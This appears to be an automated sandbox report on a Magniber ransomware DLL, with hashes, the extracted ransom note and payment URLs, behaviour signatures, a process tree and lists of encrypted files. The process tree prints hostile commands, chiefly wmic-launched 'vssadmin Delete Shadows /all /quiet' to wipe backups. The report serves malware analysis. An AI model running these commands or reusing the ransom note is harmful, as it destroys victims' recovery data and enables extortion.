Overview

overview

10

Static

static

22c59e1931...51.dll

windows7_x64

10

22c59e1931...51.dll

windows10_x64

10

Resubmissions

19-08-2021 01:57

210819-7xxlq9brfj 10

18-08-2021 02:00

210818-eve5hlsnke 10

Analysis

  • max time kernel
    114s
  • max time network
    71s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    18-08-2021 02:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll

  • Size

    21KB

  • MD5

    f9147aeda18f71043955420e853b8d3c

  • SHA1

    a9c6995a91ac8ac6c76379fd38c3fb973273d3b3

  • SHA256

    22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51

  • SHA512

    3e38ce57ada7a3fc22c2caf6a882574427c3d0b73cbfc337853017995f27688a5f344157f893f1a70cec2ced15a4a553010031b54e813cacb430670ecd8c251f

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f4ec0478e6784a70d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt http://f4ec0478e6784a70d2dgvzumt.partscs.site/dgvzumt http://f4ec0478e6784a70d2dgvzumt.uponmix.xyz/dgvzumt http://f4ec0478e6784a70d2dgvzumt.flysex.space/dgvzumt Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://f4ec0478e6784a70d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.partscs.site/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.uponmix.xyz/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.flysex.space/dgvzumt

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Modifies registry class 14 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 47 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:616
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1980
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1140
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1552
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:1780
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\MergeInstall.hta"
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        PID:2884
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1056
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt^&1^&43704893^&80^&369^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt&1&43704893&80&369&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:924 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:928
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:924 CREDAT:275469 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2764
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2060
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:824
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2052
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:868
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:948
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2068
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1980
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:336
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2076
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2280
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2292
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2316
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2348
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2432

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\Desktop\AddUnprotect.avi.dgvzumt
                MD5

                9e5b6569ccc16bd2cbc3c30abb07f239

                SHA1

                58e3397e36132da2391a0e79d6c9c30f1b818fd6

                SHA256

                767244dd5aea949b33b37deaf701be0cd8a537e7670e7f8e92fab367b9b2cc08

                SHA512

                b1623a3704a6812901eb2d08f061a410de535bc3baea713112ec851e9e2cf6b185668ecbd0dc4340c6d4273c9ac41275b80e6e88bbde8273bf79b8f51a98af50

                Download Submit

              • C:\Users\Admin\Desktop\CloseUnlock.dwg.dgvzumt
                MD5

                90b43406b74d4af38b8dea752ee41b58

                SHA1

                561c5fd7777a389eebf4d97a0081aa41c8d5824a

                SHA256

                16f55a93d1e3584a4b4a572cd462d5d62119818097536b3a46608b21e90a9582

                SHA512

                45cc11590fb6ba17030f7c72951017968efa2c23d363ea25c1306cc64dd09fde18d6fcc3eb7c68f616921224f08a54675025133aa469b2a47d3b1263258f1b54

                Download Submit

              • C:\Users\Admin\Desktop\CompleteResolve.tiff.dgvzumt
                MD5

                1d7ab715a6919ae46f6c7eceef734441

                SHA1

                a2d77342e966ee600a1454fe7bd8fba5ed414b56

                SHA256

                d43ae9d7031e509ae166a84aea1fdda6c9749daf83574e8620d1d1acb7485ead

                SHA512

                1f21d12d0fab4207a08ca45a7920dcb0500cf43366b618bc9393dbbeb0d019943ade9b63f0a98bd6889cb724bfcdeb3cdf200ebc6d5a4ed7b33042f69e00de21

                Download Submit

              • C:\Users\Admin\Desktop\ConnectWait.bmp.dgvzumt
                MD5

                b0732269443ed1a7b37be31cf964de85

                SHA1

                1574ecb15177c9855fab7003d36bc6645e4005f8

                SHA256

                be7a38e6921c84ca556c855bbafbfad84c9eb97cf50e87498c5f3c41600d3db3

                SHA512

                2d1b1a013e46cabd61dc15e0c024af7a078c98946afd2a9d225e6aa75e2e85b55b88fbad65d79b385d65ee504ee1c496f7aee04f8d3da05e7b367a02ac85f7d9

                Download Submit

              • C:\Users\Admin\Desktop\DismountHide.xlsm.dgvzumt
                MD5

                26d23231b06f7d98da55eb38f4d1d1f6

                SHA1

                43e7fab36d4477f13c2630f90a0d38f0c7f65e49

                SHA256

                088c896425ec2656526696aaeac5c082c25dc6158b1a534661e47a220e4dcfe0

                SHA512

                dd5173d4f8f3f8513c5adddf7cf5c394608f561e256d3a680e84370514baf9b31dd0e5d678589aff2019370cced32c5dd7f2ec115a1b25aaf5fe0006f8b3ee0c

                Download Submit

              • C:\Users\Admin\Desktop\JoinSplit.emf.dgvzumt
                MD5

                501fb45bb89a3c8d4c233bc9e8f02ce1

                SHA1

                e103f19956fe03b64265c15485446bfffbfa9561

                SHA256

                efd93492d3ef7e9b4872f4c875d22c23194cc2a296c5af9034d09d01bd2889c4

                SHA512

                96fdb5baf99cf4cb1d22908341030ef59a5544e11c6397ffb7eeef5fa821ff1786eb2afdb8367668a6d0d19f80d77b4239e5b7b382905de92b9853dbb53dbb1f

                Download Submit

              • C:\Users\Admin\Desktop\OpenResume.xlsx.dgvzumt
                MD5

                83ec0c3fe96313a819069c92cffbf31a

                SHA1

                92717903deba0d782b3193f68275a582db77f246

                SHA256

                fad946e7c9fb25a9ffe0bde2bac0b151fca34ff967aa49221d765753a4d36054

                SHA512

                6c61cc4ea914191458f56c682851e3a035ff6dd89cae0276984feba6775d7d38dbdd999935c72ee5036c1aaa0f4b0f1f33777d1d22eb3ab80ac04a2c796fd69c

                Download Submit

              • C:\Users\Admin\Desktop\SubmitExit.ppt.dgvzumt
                MD5

                f57d703076a558eaf5fdd848e07a96cf

                SHA1

                332237df48fdcffa01e7239643fb1878579969d0

                SHA256

                2475de0cc5d2feca60965ffc4bccbf6b6ca87069247f61754e297a36fba0fffa

                SHA512

                c876257e8783b2497c9a413eec231e9d6b781c9ffe4db3d913cbc1fc32a6284b11d0de3dcb915c858b48d4537f40ddf47f68004160b76ea2a5fb9fc0e0bd0659

                Download Submit

              • C:\Users\Admin\Desktop\SwitchPop.mov.dgvzumt
                MD5

                935ff0d908a1f8295634c3cf42a5454a

                SHA1

                b9aa9c54f5d98c4350d63fd95cbf57979395ff06

                SHA256

                17304065c5391152884c9e9e6c04989e6c0f6c350be62ad1cda101a130e5f7d9

                SHA512

                bb4f9d6a55b594a89211cd5e014112f5650585286df1c3db18d9264a2702095adaa423c933ed29768b2af72878b080c638072108afd52daa0ad65ce40da9409f

                Download Submit

              • C:\Users\Admin\Desktop\UnblockUnprotect.zip.dgvzumt
                MD5

                43cb5ac0534d9f0d0c103ca9b89b5de1

                SHA1

                125439a9419cfeda020bd6290976d262291e6d0c

                SHA256

                fcffd35703d2d9d6f77c42815c153ab370c4ec95729f7a7e68b2e0e85595e249

                SHA512

                f83b02225f89b18893618186427ecfdbd8e1702b067c35b507bb879bb0b5ae363c022293cfb1f622ed8bc9bbe836fcc4166568c98ab083c26b90c15f1318874b

                Download Submit

              • C:\Users\Admin\Desktop\readme.txt
                MD5

                35d445125a1d0f40dd9b1984a635328f

                SHA1

                e2b067056abe0f6b8aeec48be6c65bc7031b45c6

                SHA256

                f10bde942877f0c55d4e86ac5c29bb18a40c9c97e76928bf7cab6e96a1693dc3

                SHA512

                e3875122b064e724402c8798e3d6092eb222d22bb0eb723dc084e5b6a9a84504de884fcca8c975bf2df64ddb0a2d609a047093c2cd605c5923a68c689936d6ba

                Download Submit

              • C:\Users\Public\readme.txt
                MD5

                35d445125a1d0f40dd9b1984a635328f

                SHA1

                e2b067056abe0f6b8aeec48be6c65bc7031b45c6

                SHA256

                f10bde942877f0c55d4e86ac5c29bb18a40c9c97e76928bf7cab6e96a1693dc3

                SHA512

                e3875122b064e724402c8798e3d6092eb222d22bb0eb723dc084e5b6a9a84504de884fcca8c975bf2df64ddb0a2d609a047093c2cd605c5923a68c689936d6ba

                Download Submit

              • memory/336-102-0x0000000000000000-mapping.dmp

                Download

              • memory/616-93-0x0000000000000000-mapping.dmp

                Download

              • memory/824-100-0x0000000000000000-mapping.dmp

                Download

              • memory/924-92-0x0000000000000000-mapping.dmp

                Download

              • memory/928-108-0x0000000000000000-mapping.dmp

                Download

              • memory/940-104-0x0000000000000000-mapping.dmp

                Download

              • memory/948-101-0x0000000000000000-mapping.dmp

                Download

              • memory/1056-74-0x000007FEFB761000-0x000007FEFB763000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1056-73-0x0000000000000000-mapping.dmp

                Download

              • memory/1108-76-0x0000000000000000-mapping.dmp

                Download

              • memory/1112-71-0x0000000000310000-0x0000000000314000-memory.dmp

                Filesize

                16KB

                Download

              • memory/1140-96-0x0000000000000000-mapping.dmp

                Download

              • memory/1196-59-0x0000000002B40000-0x0000000002B50000-memory.dmp

                Filesize

                64KB

                Download

              • memory/1552-97-0x0000000000000000-mapping.dmp

                Download

              • memory/1644-77-0x0000000000000000-mapping.dmp

                Download

              • memory/1716-94-0x0000000000000000-mapping.dmp

                Download

              • memory/1780-98-0x0000000000000000-mapping.dmp

                Download

              • memory/1824-91-0x0000000000000000-mapping.dmp

                Download

              • memory/1980-99-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-67-0x0000000001C80000-0x0000000001C81000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-63-0x0000000001C20000-0x0000000001C21000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-72-0x0000000001FB0000-0x0000000001FB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-64-0x0000000001C30000-0x0000000001C31000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-65-0x0000000001C40000-0x0000000001C41000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-66-0x0000000001C50000-0x0000000001C51000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-61-0x0000000000110000-0x0000000000111000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-60-0x0000000000100000-0x0000000000101000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-62-0x0000000001C10000-0x0000000001C11000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-68-0x0000000001C90000-0x0000000001C91000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-69-0x0000000001CA0000-0x0000000001CA1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/1980-70-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2036-89-0x0000000000000000-mapping.dmp

                Download

              • memory/2052-111-0x0000000000000000-mapping.dmp

                Download

              • memory/2060-109-0x0000000000000000-mapping.dmp

                Download

              • memory/2068-112-0x0000000000000000-mapping.dmp

                Download

              • memory/2076-110-0x0000000000000000-mapping.dmp

                Download

              • memory/2764-113-0x0000000000000000-mapping.dmp

                Download

              • memory/2884-114-0x0000000000000000-mapping.dmp

                Download